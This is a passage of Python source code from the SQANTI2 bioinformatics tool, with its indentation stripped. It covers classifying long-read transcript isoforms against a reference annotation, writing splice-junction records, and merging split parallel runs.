return False
ref_genes = list(set(isoforms_hit.genes))
#if trec.id.startswith('PB.37872'):
#pdb.set_trace()
#
# at this point, we have already found matching genes/transcripts
# hence we do not need to update refLen or refExon
# or tss_diff and tts_diff (always set to "NA" for non-FSM/ISM matches)
#
isoforms_hit.transcripts = ["novel"]
if len(ref_genes) == 1:
# hits exactly one gene, must be either NIC or NNC
ref_gene_junctions = junctions_by_gene[ref_genes[0]]
# 1. check if all donors/acceptor sites are known (regardless of which ref gene it came from)
# 2. check if this query isoform uses a subset of the junctions from the single ref hit
all_junctions_known = True
all_junctions_in_hit_ref = True
for d,a in trec.junctions:
all_junctions_known = all_junctions_known and (d in junctions_by_chr[trec.chrom]['donors']) and (a in junctions_by_chr[trec.chrom]['acceptors'])
all_junctions_in_hit_ref = all_junctions_in_hit_ref and ((d,a) in ref_gene_junctions)
if all_junctions_known:
isoforms_hit.str_class="novel_in_catalog"
if all_junctions_in_hit_ref:
isoforms_hit.subtype = "combination_of_known_junctions"
else:
isoforms_hit.subtype = "combination_of_known_splicesites"
else:
isoforms_hit.str_class="novel_not_in_catalog"
isoforms_hit.subtype = "at_least_one_novel_splicesite"
else: # see if it is fusion
# list of a ref junctions from all genes, including potential shared junctions
# NOTE: some ref genes could be mono-exonic so no junctions
all_ref_junctions = list(itertools.chain(junctions_by_gene[ref_gene] for ref_gene in ref_genes if ref_gene in junctions_by_gene))
# (junction index) --> number of refs that have this junction
junction_ref_hit = dict((i, all_ref_junctions.count(junc)) for i,junc in enumerate(trec.junctions))
# if the same query junction appears in more than one of the hit references, it is not a fusion
if max(junction_ref_hit.values()) > 1:
isoforms_hit.str_class = "moreJunctions"
else:
isoforms_hit.str_class = "fusion"
isoforms_hit.subtype = "mono-exon" if trec.exonCount==1 else "multi-exon"
if has_intron_retention():
isoforms_hit.subtype = "intron_retention"
return isoforms_hit
def associationOverlapping(isoforms_hit, trec, junctions_by_chr):
# at this point: definitely not FSM or ISM or NIC or NNC
# possibly (in order of preference assignment):
# - antisense (on opp strand of a known gene)
# - genic (overlaps a combination of exons and introns), ignore strand
# - genic_intron (completely within an intron), ignore strand
# - intergenic (does not overlap a gene at all), ignore strand
isoforms_hit.str_class = "intergenic"
isoforms_hit.transcripts = ["novel"]
isoforms_hit.subtype = "mono-exon" if trec.exonCount==1 else "multi-exon"
#if trec.id.startswith('PB.37872.'):
# pdb.set_trace()
if len(isoforms_hit.genes) == 0:
# completely no overlap with any genes on the same strand
# check if it is anti-sense to a known gene, otherwise it's genic_intron or intergenic
if len(isoforms_hit.AS_genes) == 0 and trec.chrom in junctions_by_chr:
# no hit even on opp strand
# see if it is completely contained within a junction
da_pairs = junctions_by_chr[trec.chrom]['da_pairs']
i = bisect.bisect_left(da_pairs, (trec.txStart, trec.txEnd))
while i < len(da_pairs) and da_pairs[i][0] <= trec.txStart:
if da_pairs[i][0] <= trec.txStart <= trec.txStart <= da_pairs[i][1]:
isoforms_hit.str_class = "genic_intron"
break
i += 1
else:
# hits one or more genes on the opposite strand
isoforms_hit.str_class = "antisense"
isoforms_hit.genes = ["novelGene_{g}_AS".format(g=g) for g in isoforms_hit.AS_genes]
else:
# (Liz) used to put NNC here - now just genic
isoforms_hit.str_class = "genic"
# overlaps with one or more genes on the same strand
#if trec.exonCount >= 2:
# # multi-exon and has a same strand gene hit, must be NNC
# isoforms_hit.str_class = "novel_not_in_catalog"
# isoforms_hit.subtype = "at_least_one_novel_splicesite"
#else:
# # single exon, must be genic
# isoforms_hit.str_class = "genic"
return isoforms_hit
def write_junctionInfo(trec, junctions_by_chr, accepted_canonical_sites, indelInfo, genome_dict, fout, covInf=None, covNames=None, phyloP_reader=None):
"""
:param trec: query isoform genePredRecord
:param junctions_by_chr: dict of chr -> {'donors': <sorted list of donors>, 'acceptors': <sorted list of acceptors>, 'da_pairs': <sorted list of junctions>}
:param accepted_canonical_sites: list of accepted canonical splice sites
:param indelInfo: indels near junction information, dict of pbid --> list of junctions near indel (in Interval format)
:param genome_dict: genome fasta dict
:param fout: DictWriter handle
:param covInf: (optional) junction coverage information, dict of (chrom,strand) -> (0-based start,1-based end) -> dict of {sample -> unique read count}
:param covNames: (optional) list of sample names for the junction coverage information
:param phyloP_reader: (optional) dict of (chrom,0-based coord) --> phyloP score
Write a record for each junction in query isoform
"""
def find_closest_in_list(lst, pos):
i = bisect.bisect_left(lst, pos)
if i == 0:
return lst[0]-pos
elif i == len(lst):
return lst[-1]-pos
else:
a, b = lst[i-1]-pos, lst[i]-pos
if abs(a) < abs(b): return a
else: return b
if trec.chrom not in junctions_by_chr:
# nothing to do
return
# go through each trec junction
for junction_index, (d, a) in enumerate(trec.junctions):
# NOTE: donor just means the start, not adjusted for strand
# find the closest junction start site
min_diff_s = -find_closest_in_list(junctions_by_chr[trec.chrom]['donors'], d)
# find the closest junction end site
min_diff_e = find_closest_in_list(junctions_by_chr[trec.chrom]['acceptors'], a)
splice_site = trec.get_splice_site(genome_dict, junction_index)
indel_near_junction = "NA"
if indelInfo is not None:
indel_near_junction = "TRUE" if (trec.id in indelInfo and Interval(d,a) in indelInfo[trec.id]) else "FALSE"
sample_cov = defaultdict(lambda: 0) # sample -> unique count for this junction
if covInf is not None:
sample_cov = covInf[(trec.chrom, trec.strand)][(d,a)]
# if phyloP score dict exists, give the triplet score of (last base in donor exon), donor site -- similarly for acceptor
phyloP_start, phyloP_end = 'NA', 'NA'
if phyloP_reader is not None:
phyloP_start = ",".join([str(x) for x in [phyloP_reader.get_pos(trec.chrom, d-1), phyloP_reader.get_pos(trec.chrom, d), phyloP_reader.get_pos(trec.chrom, d+1)]])
phyloP_end = ",".join([str(x) for x in [phyloP_reader.get_pos(trec.chrom, a-1), phyloP_reader.get_pos(trec.chrom, a),
phyloP_reader.get_pos(trec.chrom, a+1)]])
qj = {'isoform': trec.id,
'junction_number': "junction_"+str(junction_index+1),
"chrom": trec.chrom,
"strand": trec.strand,
"genomic_start_coord": d+1, # write out as 1-based start
"genomic_end_coord": a, # already is 1-based end
"transcript_coord": "?????", # this is where the exon ends w.r.t to id sequence, ToDo: implement later
"junction_category": "known" if ((d,a) in junctions_by_chr[trec.chrom]['da_pairs']) else "novel",
"start_site_category": "known" if min_diff_s==0 else "novel",
"end_site_category": "known" if min_diff_e==0 else "novel",
"diff_to_Ref_start_site": min_diff_s,
"diff_to_Ref_end_site": min_diff_e,
"bite_junction": "TRUE" if (min_diff_s==0 or min_diff_e==0) else "FALSE",
"splice_site": splice_site,
"canonical": "canonical" if splice_site in accepted_canonical_sites else "non_canonical",
"RTS_junction": "????", # First write ???? in _tmp, later is TRUE/FALSE
"indel_near_junct": indel_near_junction,
"phyloP_start": phyloP_start,
"phyloP_end": phyloP_end,
"sample_with_cov": sum(cov!=0 for cov in sample_cov.values()) if covInf is not None else "NA",
"total_coverage": sum(sample_cov.values()) if covInf is not None else "NA"}
if covInf is not None:
for sample in covNames:
qj[sample] = sample_cov[sample]
fout.writerow(qj)
def isoformClassification(args, isoforms_by_chr, refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene, genome_dict, indelsJunc, orfDict):
## read coverage files if provided
if args.coverage is not None:
print("**** Reading Splice Junctions coverage files.", file=sys.stdout)
SJcovNames, SJcovInfo = STARcov_parser(args.coverage)
fields_junc_cur = FIELDS_JUNC + SJcovNames # add the samples to the header
else:
SJcovNames, SJcovInfo = None, None
print("Splice Junction Coverage files not provided.", file=sys.stdout)
fields_junc_cur = FIELDS_JUNC
if args.cage_peak is not None:
print("**** Reading CAGE Peak data.", file=sys.stdout)
cage_peak_obj = CAGEPeak(args.cage_peak)
else:
cage_peak_obj = None
if args.polyA_peak is not None:
print("**** Reading polyA Peak data.", file=sys.stdout)
polya_peak_obj = PolyAPeak(args.polyA_peak)
else:
polya_peak_obj = None
if args.polyA_motif_list is not None:
print("**** Reading PolyA motif list.", file=sys.stdout)
polyA_motif_list = []
for line in open(args.polyA_motif_list):
x = line.strip().upper().replace('U', 'A')
if any(s not in ('A','T','C','G') for s in x):
print("PolyA motif must be A/T/C/G only! Saw: {0}. Abort!".format(x), file=sys.stderr)
sys.exit(-1)
polyA_motif_list.append(x)
else:
polyA_motif_list = None
if args.phyloP_bed is not None:
print("**** Reading PhyloP BED file.", file=sys.stdout)
phyloP_reader = LazyBEDPointReader(args.phyloP_bed)
else:
phyloP_reader = None
# running classification
print("**** Performing Classification of Isoforms....", file=sys.stdout)
accepted_canonical_sites = list(args.sites.split(","))
handle_class = open(outputClassPath+"_tmp", "w")
fout_class = DictWriter(handle_class, fieldnames=FIELDS_CLASS, delimiter='\t')
fout_class.writeheader()
#outputJuncPath = outputPathPrefix+"_junctions.txt"
handle_junc = open(outputJuncPath+"_tmp", "w")
fout_junc = DictWriter(handle_junc, fieldnames=fields_junc_cur, delimiter='\t')
fout_junc.writeheader()
isoforms_info = {}
novel_gene_index = 1
for chrom,records in isoforms_by_chr.items():
for rec in records:
# Find best reference hit
isoform_hit = transcriptsKnownSpliceSites(refs_1exon_by_chr, refs_exons_by_chr, start_ends_by_gene, rec, genome_dict, nPolyA=args.window)
if isoform_hit.str_class in ("anyKnownJunction", "anyKnownSpliceSite"):
# not FSM or ISM --> see if it is NIC, NNC, or fusion
isoform_hit = novelIsoformsKnownGenes(isoform_hit, rec, junctions_by_chr, junctions_by_gene, start_ends_by_gene)
elif isoform_hit.str_class in ("", "geneOverlap"):
# possibly NNC, genic, genic intron, anti-sense, or intergenic
isoform_hit = associationOverlapping(isoform_hit, rec, junctions_by_chr)
# write out junction information
write_junctionInfo(rec, junctions_by_chr, accepted_canonical_sites, indelsJunc, genome_dict, fout_junc, covInf=SJcovInfo, covNames=SJcovNames, phyloP_reader=phyloP_reader)
if isoform_hit.str_class in ("intergenic", "genic_intron"):
# Liz: I don't find it necessary to cluster these novel genes. They should already be always non-overlapping.
if args.novel_gene_prefix is not None: # used by splits to not have redundant novelGene IDs
isoform_hit.genes = ['novelGene_' + str(args.novel_gene_prefix) + '_' + str(novel_gene_index)]
else:
isoform_hit.genes = ['novelGene_' + str(novel_gene_index)]
isoform_hit.transcripts = ['novel']
novel_gene_index += 1
# look at Cage Peak info (if available)
if cage_peak_obj is not None:
if rec.strand == '+':
within_cage, dist_cage = cage_peak_obj.find(rec.chrom, rec.strand, rec.txStart)
else:
within_cage, dist_cage = cage_peak_obj.find(rec.chrom, rec.strand, rec.txEnd)
isoform_hit.within_cage = within_cage
isoform_hit.dist_cage = dist_cage
# look at PolyA Peak info (if available)
if polya_peak_obj is not None:
if rec.strand == '+':
within_polya_site, dist_polya_site = polya_peak_obj.find(rec.chrom, rec.strand, rec.txStart)
else:
within_polya_site, dist_polya_site = polya_peak_obj.find(rec.chrom, rec.strand, rec.txEnd)
isoform_hit.within_polya_site = within_polya_site
isoform_hit.dist_polya_site = dist_polya_site
# polyA motif finding: look within 50 bp upstream of 3' end for the highest ranking polyA motif signal (user provided)
if polyA_motif_list is not None:
if rec.strand == '+':
polyA_motif, polyA_dist = find_polyA_motif(str(genome_dict[rec.chrom][rec.txEnd-50:rec.txEnd].seq), polyA_motif_list)
else:
polyA_motif, polyA_dist = find_polyA_motif(str(genome_dict[rec.chrom][rec.txStart:rec.txStart+50].reverse_complement().seq), polyA_motif_list)
isoform_hit.polyA_motif = polyA_motif
isoform_hit.polyA_dist = polyA_dist
# Fill in ORF/coding info and NMD detection
if rec.id in orfDict:
isoform_hit.coding = "coding"
isoform_hit.ORFlen = orfDict[rec.id].orf_length
isoform_hit.CDS_start = orfDict[rec.id].cds_start # 1-based start
isoform_hit.CDS_end = orfDict[rec.id].cds_end # 1-based end
m = {} # transcript coord (0-based) --> genomic coord (0-based)
if rec.strand == '+':
i = 0
for exon in rec.exons:
for c in range(exon.start, exon.end):
m[i] = c
i += 1
else: # - strand
i = 0
for exon in rec.exons:
for c in range(exon.start, exon.end):
m[rec.length-i-1] = c
i += 1
orfDict[rec.id].cds_genomic_start = m[orfDict[rec.id].cds_start-1] + 1 # make it 1-based
orfDict[rec.id].cds_genomic_end = m[orfDict[rec.id].cds_end-1] + 1 # make it 1-based
isoform_hit.CDS_genomic_start = orfDict[rec.id].cds_genomic_start
isoform_hit.CDS_genomic_end = orfDict[rec.id].cds_genomic_end
if orfDict[rec.id].cds_genomic_start is None: # likely SAM CIGAR mapping issue coming from aligner
continue # we have to skip the NMD
# NMD detection
# if + strand, see if CDS stop is before the last junction
if len(rec.junctions) > 0:
if rec.strand == '+':
dist_to_last_junc = orfDict[rec.id].cds_genomic_end - rec.junctions[-1][0]
else: # - strand
dist_to_last_junc = rec.junctions[0][1] - orfDict[rec.id].cds_genomic_end
isoform_hit.is_NMD = "TRUE" if dist_to_last_junc < 0 else "FALSE"
isoforms_info[rec.id] = isoform_hit
fout_class.writerow(isoform_hit.as_dict())
handle_class.close()
handle_junc.close()
return isoforms_info
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
mean = sum(data)*1. / n # mean
var = sum(pow(x - mean, 2) for x in data) / n # variance
return math.sqrt(var) # standard deviation
def find_polyA_motif(genome_seq, polyA_motif_list):
"""
:param genome_seq: genomic sequence to search polyA motifs from, must already be oriented
:param polyA_motif_list: ranked list of motifs to find, report the top one found
:return: polyA_motif, polyA_dist (how many bases upstream is this found)
"""
for motif in polyA_motif_list:
i = genome_seq.find(motif)
if i >= 0:
return motif, -(len(genome_seq)-i-len(motif)+1)
return 'NA', 'NA'
def FLcount_parser(fl_count_filename):
"""
:param fl_count_filename: could be a single sample or multi-sample (chained or demux) count file
:return: list of samples, <dict>
If single sample, returns True, dict of {pbid} -> {count}
If multiple sample, returns False, dict of {pbid} -> {sample} -> {count}
For multi-sample, acceptable formats are:
//demux-based
id,JL3N,FL1N,CL1N,FL3N,CL3N,JL1N
PB.2.1,0,0,1,0,0,1
PB.3.3,33,14,47,24,15,38
PB.3.2,2,1,0,0,0,1
//chain-based
superPBID<tab>sample1<tab>sample2
"""
fl_count_dict = {}
samples = ['NA']
flag_single_sample = True
f = open(fl_count_filename)
while True:
cur_pos = f.tell()
line = f.readline()
if not line.startswith('#'):
# if it first thing is superPBID or id or pbid
if line.startswith('pbid'):
type = 'SINGLE_SAMPLE'
sep = '\t'
elif line.startswith('superPBID'):
type = 'MULTI_CHAIN'
sep = '\t'
elif line.startswith('id'):
type = 'MULTI_DEMUX'
sep = ','
else:
raise Exception("Unexpected count file format! Abort!")
f.seek(cur_pos)
break
reader = DictReader(f, delimiter=sep)
count_header = reader.fieldnames
if type=='SINGLE_SAMPLE':
if 'count_fl' not in count_header:
print("Expected `count_fl` field in count file {0}. Abort!".format(fl_count_filename), file=sys.stderr)
sys.exit(-1)
d = dict((r['pbid'], r) for r in reader)
elif type=='MULTI_CHAIN':
d = dict((r['superPBID'], r) for r in reader)
flag_single_sample = False
elif type=='MULTI_DEMUX':
d = dict((r['id'], r) for r in reader)
flag_single_sample = False
else:
print("Expected pbid or superPBID as a column in count file {0}. Abort!".format(fl_count_filename), file=sys.stderr)
sys.exit(-1)
f.close()
if flag_single_sample: # single sample
for k,v in d.items():
fl_count_dict[k] = int(v['count_fl'])
else: # multi-sample
for k,v in d.items():
fl_count_dict[k] = {}
samples = list(v.keys())
for sample,count in v.items():
if sample not in ('superPBID', 'id'):
fl_count_dict[k][sample] = int(count) if count!='NA' else 0
samples.sort()
if type=='MULTI_CHAIN':
samples.remove('superPBID')
elif type=='MULTI_DEMUX':
samples.remove('id')
return samples, fl_count_dict
def run(args):
global outputClassPath
global outputJuncPath
outputClassPath, outputJuncPath = get_class_junc_filenames(args)
start3 = timeit.default_timer()
print("**** Parsing provided files....", file=sys.stdout)
print("Reading genome fasta {0}....".format(args.genome), file=sys.stdout)
# NOTE: can't use LazyFastaReader because inefficient. Bring the whole genome in!
genome_dict = dict((r.name, r) for r in SeqIO.parse(open(args.genome), 'fasta'))
## correction of sequences and ORF prediction (if gtf provided instead of fasta file, correction of sequences will be skipped)
orfDict = correctionPlusORFpred(args, genome_dict)
## parse reference id (GTF) to dicts
refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene = reference_parser(args, list(genome_dict.keys()))
## parse query isoforms
isoforms_by_chr = isoforms_parser(args)
## Run indel computation if sam exists
# indelsJunc: dict of pbid --> list of junctions near indel (in Interval format)
# indelsTotal: dict of pbid --> total indels count
if os.path.exists(corrSAM):
(indelsJunc, indelsTotal) = calc_indels_from_sam(corrSAM)
else:
indelsJunc = None
indelsTotal = None
# isoform classification + intra-priming + id and junction characterization
isoforms_info = isoformClassification(args, isoforms_by_chr, refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene, genome_dict, indelsJunc, orfDict)
print("Number of classified isoforms: {0}".format(len(isoforms_info)), file=sys.stdout)
write_collapsed_GFF_with_CDS(isoforms_info, corrGTF, corrGTF+'.cds.gff')
os.rename(corrGTF+'.cds.gff', corrGTF)
## RT-switching computation
print("**** RT-switching computation....", file=sys.stderr)
# RTS_info: dict of (pbid) -> list of RT junction. if RTS_info[pbid] == [], means all junctions are non-RT.
RTS_info = rts([outputJuncPath+"_tmp", args.genome, "-a"], genome_dict)
for pbid in isoforms_info:
if pbid in RTS_info and len(RTS_info[pbid]) > 0:
isoforms_info[pbid].RT_switching = "TRUE"
else:
isoforms_info[pbid].RT_switching = "FALSE"
## FSM classification
geneFSM_dict = defaultdict(lambda: [])
for iso in isoforms_info:
gene = isoforms_info[iso].geneName() # if multi-gene, returns "geneA_geneB_geneC..."
geneFSM_dict[gene].append(isoforms_info[iso].str_class)
fields_class_cur = FIELDS_CLASS
## FL count file
if args.fl_count:
if not os.path.exists(args.fl_count):
print("FL count file {0} does not exist!".format(args.fl_count), file=sys.stderr)
sys.exit(-1)
print("**** Reading Full-length read abundance files...", file=sys.stderr)
fl_samples, fl_count_dict = FLcount_parser(args.fl_count)
for pbid in fl_count_dict:
if pbid not in isoforms_info:
print("WARNING: {0} found in FL count file but not in input fasta.".format(pbid), file=sys.stderr)
if len(fl_samples) == 1: # single sample from PacBio
print("Single-sample PacBio FL count format detected.", file=sys.stderr)
for iso in isoforms_info:
if iso in fl_count_dict:
isoforms_info[iso].FL = fl_count_dict[iso]
else:
print("WARNING: {0} not found in FL count file. Assign count as 0.".format(iso), file=sys.stderr)
isoforms_info[iso].FL = 0
else: # multi-sample
print("Multi-sample PacBio FL count format detected.", file=sys.stderr)
fields_class_cur = FIELDS_CLASS + ["FL."+s for s in fl_samples]
for iso in isoforms_info:
if iso in fl_count_dict:
isoforms_info[iso].FL_dict = fl_count_dict[iso]
else:
print("WARNING: {0} not found in FL count file. Assign count as 0.".format(iso), file=sys.stderr)
isoforms_info[iso].FL_dict = defaultdict(lambda: 0)
else:
print("Full-length read abundance files not provided.", file=sys.stderr)
## Isoform expression information
if args.expression:
print("**** Reading Isoform Expression Information.", file=sys.stderr)
exp_dict = expression_parser(args.expression)
gene_exp_dict = {}
for iso in isoforms_info:
if iso not in exp_dict:
exp_dict[iso] = 0
print("WARNING: isoform {0} not found in expression matrix. Assigning TPM of 0.".format(iso), file=sys.stderr)
gene = isoforms_info[iso].geneName()
if gene not in gene_exp_dict:
gene_exp_dict[gene] = exp_dict[iso]
else:
gene_exp_dict[gene] = gene_exp_dict[gene]+exp_dict[iso]
else:
exp_dict = None
gene_exp_dict = None
print("Isoforms expression files not provided.", file=sys.stderr)
## Adding indel, FSM class and expression information
for iso in isoforms_info:
gene = isoforms_info[iso].geneName()
if exp_dict is not None and gene_exp_dict is not None:
isoforms_info[iso].geneExp = gene_exp_dict[gene]
isoforms_info[iso].isoExp = exp_dict[iso]
if len(geneFSM_dict[gene])==1:
isoforms_info[iso].FSM_class = "A"
elif "full-splice_match" in geneFSM_dict[gene]:
isoforms_info[iso].FSM_class = "C"
else:
isoforms_info[iso].FSM_class = "B"
if indelsTotal is not None:
for iso in isoforms_info:
if iso in indelsTotal:
isoforms_info[iso].nIndels = indelsTotal[iso]
else:
isoforms_info[iso].nIndels = 0
## Read junction files and create attributes per id
# Read the junction information to fill in several remaining unfilled fields in classification
# (1) "canonical": is "canonical" if all junctions are canonical, otherwise "non_canonical"
# (2) "bite": is TRUE if any of the junction "bite_junction" field is TRUE
reader = DictReader(open(outputJuncPath+"_tmp"), delimiter='\t')
fields_junc_cur = reader.fieldnames
sj_covs_by_isoform = defaultdict(lambda: []) # pbid --> list of total_cov for each junction so we can calculate SD later
for r in reader:
# only need to do assignment if:
# (1) the .canonical field is still "NA"
# (2) the junction is non-canonical
assert r['canonical'] in ('canonical', 'non_canonical')
if (isoforms_info[r['isoform']].canonical == 'NA') or \
(r['canonical'] == 'non_canonical'):
isoforms_info[r['isoform']].canonical = r['canonical']
if (isoforms_info[r['isoform']].bite == 'NA') or (r['bite_junction'] == 'TRUE'):
isoforms_info[r['isoform']].bite = r['bite_junction']
if r['indel_near_junct'] == 'TRUE':
if isoforms_info[r['isoform']].nIndelsJunc == 'NA':
isoforms_info[r['isoform']].nIndelsJunc = 0
isoforms_info[r['isoform']].nIndelsJunc += 1
# min_cov: min( total_cov[j] for each junction j in this isoform )
# min_cov_pos: the junction [j] that attributed to argmin(total_cov[j])
# min_sample_cov: min( sample_cov[j] for each junction in this isoform )
# sd_cov: sd( total_cov[j] for each junction j in this isoform )
if r['sample_with_cov'] != 'NA':
sample_with_cov = int(r['sample_with_cov'])
if (isoforms_info[r['isoform']].min_samp_cov == 'NA') or (isoforms_info[r['isoform']].min_samp_cov > sample_with_cov):
isoforms_info[r['isoform']].min_samp_cov = sample_with_cov
if r['total_coverage'] != 'NA':
total_cov = int(r['total_coverage'])
sj_covs_by_isoform[r['isoform']].append(total_cov)
if (isoforms_info[r['isoform']].min_cov == 'NA') or (isoforms_info[r['isoform']].min_cov > total_cov):
isoforms_info[r['isoform']].min_cov = total_cov
isoforms_info[r['isoform']].min_cov_pos = r['junction_number']
for pbid, covs in sj_covs_by_isoform.items():
isoforms_info[pbid].sd = pstdev(covs)
#### Printing output file:
print("**** Writing output files....", file=sys.stderr)
# sort isoform keys
iso_keys = list(isoforms_info.keys())
iso_keys.sort(key=lambda x: (isoforms_info[x].chrom,isoforms_info[x].id))
with open(outputClassPath, 'w') as h:
fout_class = DictWriter(h, fieldnames=fields_class_cur, delimiter='\t')
fout_class.writeheader()
for iso_key in iso_keys:
fout_class.writerow(isoforms_info[iso_key].as_dict())
# Now that RTS info is obtained, we can write the final junctions.txt
with open(outputJuncPath, 'w') as h:
fout_junc = DictWriter(h, fieldnames=fields_junc_cur, delimiter='\t')
fout_junc.writeheader()
for r in DictReader(open(outputJuncPath+"_tmp"), delimiter='\t'):
if r['isoform'] in RTS_info:
if r['junction_number'] in RTS_info[r['isoform']]:
r['RTS_junction'] = 'TRUE'
else:
r['RTS_junction'] = 'FALSE'
fout_junc.writerow(r)
## Generating report
if not args.skip_report:
print("**** Generating SQANTI2 report....", file=sys.stderr)
cmd = RSCRIPTPATH + " {d}/{f} {c} {j} {p}".format(d=utilitiesPath, f=RSCRIPT_REPORT, c=outputClassPath, j=outputJuncPath, p=args.doc)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running command: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
stop3 = timeit.default_timer()
print("Removing temporary files....", file=sys.stderr)
os.remove(outputClassPath+"_tmp")
os.remove(outputJuncPath+"_tmp")
print("SQANTI2 complete in {0} sec.".format(stop3 - start3), file=sys.stderr)
def rename_isoform_seqids(input_fasta, force_id_ignore=False):
"""
Rename input isoform fasta/fastq, which is usually mapped, collapsed Iso-Seq data with IDs like:
PB.1.1|chr1:10-100|xxxxxx
to just being "PB.1.1"
:param input_fasta: Could be either fasta or fastq, autodetect.
:return: output fasta with the cleaned up sequence ID, is_fusion flag
"""
type = 'fasta'
with open(input_fasta) as h:
if h.readline().startswith('@'): type = 'fastq'
f = open(input_fasta[:input_fasta.rfind('.')]+'.renamed.fasta', 'w')
for r in SeqIO.parse(open(input_fasta), type):
m1 = seqid_rex1.match(r.id)
m2 = seqid_rex2.match(r.id)
m3 = seqid_fusion.match(r.id)
if not force_id_ignore and (m1 is None and m2 is None and m3 is None):
print("Invalid input IDs! Expected PB.X.Y or PB.X.Y|xxxxx or PBfusion.X format but saw {0} instead. Abort!".format(r.id), file=sys.stderr)
sys.exit(-1)
if r.id.startswith('PB.') or r.id.startswith('PBfusion.'): # PacBio fasta header
newid = r.id.split('|')[0]
else:
raw = r.id.split('|')
if len(raw) > 4: # RefSeq fasta header
newid = raw[3]
else:
newid = r.id.split()[0] # Ensembl fasta header
f.write(">{0}\n{1}\n".format(newid, r.seq))
f.close()
return f.name
class CAGEPeak:
def __init__(self, cage_bed_filename):
self.cage_bed_filename = cage_bed_filename
self.cage_peaks = defaultdict(lambda: IntervalTree()) # (chrom,strand) --> intervals of peaks
self.read_bed()
def read_bed(self):
for line in open(self.cage_bed_filename):
raw = line.strip().split()
chrom = raw[0]
start0 = int(raw[1])
end1 = int(raw[2])
strand = raw[5]
tss0 = int(raw[6])
self.cage_peaks[(chrom,strand)].insert(start0, end1, (tss0, start0, end1))
def find(self, chrom, strand, query, search_window=10000):
"""
:param start0: 0-based start of the 5' end to query
:return: <True/False falls within a cage peak>, <nearest dist to TSS>
dist to TSS is 0 if right on spot
dist to TSS is + if downstream, - if upstream (watch for strand!!!)
"""
within_peak, dist_peak = False, 'NA'
for (tss0,start0,end1) in self.cage_peaks[(chrom,strand)].find(query-search_window, query+search_window):
if not within_peak:
within_peak, dist_peak = (start0<=query<end1), (query - tss0) * (-1 if strand=='-' else +1)
else:
d = (query - tss0) * (-1 if strand=='-' else +1)
if abs(d) < abs(dist_peak):
within_peak, dist_peak = (start0<=query<end1), d
return within_peak, dist_peak
class PolyAPeak:
def __init__(self, polya_bed_filename):
self.polya_bed_filename = polya_bed_filename
self.polya_peaks = defaultdict(lambda: IntervalTree()) # (chrom,strand) --> intervals of peaks
self.read_bed()
def read_bed(self):
for line in open(self.polya_bed_filename):
raw = line.strip().split()
chrom = raw[0]
start0 = int(raw[1])
end1 = int(raw[2])
strand = raw[5]
self.polya_peaks[(chrom,strand)].insert(start0, end1, (start0, end1))
def find(self, chrom, strand, query, search_window=100):
"""
:param start0: 0-based start of the 5' end to query
:return: <True/False falls within some distance to polyA>, distance to closest
+ if downstream, - if upstream (watch for strand!!!)
"""
assert strand in ('+', '-')
hits = self.polya_peaks[(chrom,strand)].find(query-search_window, query+search_window)
if len(hits) == 0:
return False, None
else:
s0, e1 = hits[0]
min_dist = query - s0
for s0, e1 in hits[1:]:
d = query - s0
if abs(d) < abs(min_dist):
min_dist = d
if strand == '-':
min_dist = -min_dist
return True, min_dist
def split_input_run(args):
if os.path.exists(SPLIT_ROOT_DIR):
print("WARNING: {0} directory already exists! Abort!".format(SPLIT_ROOT_DIR), file=sys.stderr)
sys.exit(-1)
else:
os.makedirs(SPLIT_ROOT_DIR)
if args.gtf:
recs = [r for r in collapseGFFReader(args.isoforms)]
n = len(recs)
chunk_size = n//args.chunks + (n%args.chunks >0)
split_outs = []
#pdb.set_trace()
for i in range(args.chunks):
if i*chunk_size >= n:
break
d = os.path.join(SPLIT_ROOT_DIR, str(i))
os.makedirs(d)
f = open(os.path.join(d, os.path.basename(args.isoforms)+'.split'+str(i)), 'w')
for j in range(i*chunk_size, min((i+1)*chunk_size, n)):
write_collapseGFF_format(f, recs[j])
f.close()
split_outs.append((os.path.abspath(d), f.name))
else:
recs = [r for r in SeqIO.parse(open(args.isoforms),'fasta')]
n = len(recs)
chunk_size = n//args.chunks + (n%args.chunks >0)
split_outs = []
for i in range(args.chunks):
if i*chunk_size >= n:
break
d = os.path.join(SPLIT_ROOT_DIR, str(i))
os.makedirs(d)
f = open(os.path.join(d, os.path.basename(args.isoforms)+'.split'+str(i)), 'w')
for j in range(i*chunk_size, min((i+1)*chunk_size, n)):
SeqIO.write(recs[j], f, 'fasta')
f.close()
split_outs.append((os.path.abspath(d), f.name))
pools = []
for i,(d,x) in enumerate(split_outs):
print("launching worker on on {0}....".format(x))
args2 = copy.deepcopy(args)
args2.isoforms = x
args2.novel_gene_prefix = str(i)
args2.dir = d
args2.skip_report = True
p = Process(target=run, args=(args2,))
p.start()
pools.append(p)
for p in pools:
p.join()
return [d for (d,x) in split_outs]
def combine_split_runs(args, split_dirs):
"""
Combine .faa, .fasta, .gtf, .classification.txt, .junctions.txt
Then write out the PDF report
"""
corrGTF, corrSAM, corrFASTA, corrORF = get_corr_filenames(args)
outputClassPath, outputJuncPath = get_class_junc_filenames(args)
if not args.skipORF:
f_faa = open(corrORF, 'w')
f_fasta = open(corrFASTA, 'w')
f_gtf = open(corrGTF, 'w')
f_class = open(outputClassPath, 'w')
f_junc = open(outputJuncPath, 'w')
for i,split_d in enumerate(split_dirs):
_gtf, _sam, _fasta, _orf = get_corr_filenames(args, split_d)
_class, _junc = get_class_junc_filenames(args, split_d)
if not args.skipORF:
with open(_orf) as h: f_faa.write(h.read())
with open(_gtf) as h: f_gtf.write(h.read())
with open(_fasta) as h: f_fasta.write(h.read())
with open(_class) as h:
if i == 0:
f_class.write(h.readline())
else:
h.readline()
f_class.write(h.read())
with open(_junc) as h:
if i == 0:
f_junc.write(h.readline())
else:
h.readline()
f_junc.write(h.read())
f_fasta.close()
f_gtf.close()
f_class.close()
f_junc.close()
if not args.skipORF:
f_faa.close()
if not args.skip_report:
print("**** Generating SQANTI2 report....", file=sys.stderr)
cmd = RSCRIPTPATH + " {d}/{f} {c} {j} {p}".format(d=utilitiesPath, f=RSCRIPT_REPORT, c=outputClassPath, j=outputJuncPath, p=args.doc)
if subprocess.check_call(cmd, shell=True)!=0:
